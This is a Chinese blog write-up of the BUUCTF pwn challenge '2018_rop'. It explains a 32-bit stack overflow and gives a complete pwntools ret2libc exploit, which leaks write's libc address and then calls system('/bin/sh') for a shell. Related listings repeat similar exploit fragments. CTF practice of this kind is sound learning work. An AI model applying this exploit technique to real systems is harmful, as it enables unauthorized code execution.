BUUCTF--铁人三项(第五赛区)_2018_rop1

于 2024-01-08 12:52:27 发布
阅读量514 收藏 9
点赞数 7
分类专栏: pwn CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135454441
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

这题是一题标准的rop。先简单查看下保护:

32位程序,黑盒测试下效果:

一上来就是输入,然后结尾会输出Hello,World.看看IDA中具体逻辑如何:

漏洞点主要在vulnerable_function()函数中。老常规栈溢出了。做这种题的思路:

1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序

2.通过计算算出libc基地址进一步得到system地址。

3.找到libc中bin/sh的位置

4.第二次布局就是直接布置rop

exp如下:

#coding=utf-8
from pwn import *    
context.log_level='debug'
#p=remote("node3.buuoj.cn",28424)  
p=process("./2018_rop")
elf=ELF("./2018_rop")
libc=ELF('/lib/i386-linux-gnu/libc-2.27.so')  #here is your libc


vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']

payload = 'a'*(0x88+0x4)
payload += p32(write_plt)        
payload += p32(vul_addr)          
payload += p32(1)                 
payload += p32(write_got)         
payload += p32(4)                 

gdb.attach(p)
p.sendline(payload)
write_addr=u32(p.recv())

print('!!!',hex(write_got))

write_offset=libc.sym['write']
system_offset =libc.sym['system']
binsh_offset =next(libc.search('/bin/sh'))

base_addr = write_addr - write_offset
sys_addr = system_offset + base_addr
bin_addr = binsh_offset + base_addr




payload1 = "a" * 0x88
payload1 += "b"*4
payload1 += p32(sys_addr)+p32(1)+p32(bin_addr)
p.sendline(payload1)
pause()
p.interactive()

我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。

call就不要ret
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018年信息安全铁人三项赛数据赛题题目(数据包分析)
04-30
信息安全铁人三项赛应运而生,这是一项面向全国大学生的公益性科技类竞赛,旨在通过整合信息安全产业资源、对接高校,为大学生提供一个进行信息安全技术创新、深入产业行业应用以及扩展安全视野的平台。资源为分区决赛数据赛题目
0001-TIPS-2020-hxp-kernel-rop : ret2user
最新发布
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 968
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 347
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 616
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 320
【BUUCTFPWN】铁人三项(第五赛区)_2018_rop题解
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
《ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
D1-H_Linux_G2D_开发指南1
08-03
1. 前言 - 文档简介:该文档提供了D1-H平台上的Linux G2D模块的开发指导,包括模块功能、接口说明和配置方法。 - 目标读者:适用于Linux驱动开发者、嵌入式系统工程师以及对图形处理有兴趣的技术人员。 - 适用...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 494
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 222
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 684
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 374
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 225
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 418
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现绕过程序的安全机制,执行恶意代码。在这道题目中,需要通过构造ROP链来实现获取flag的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值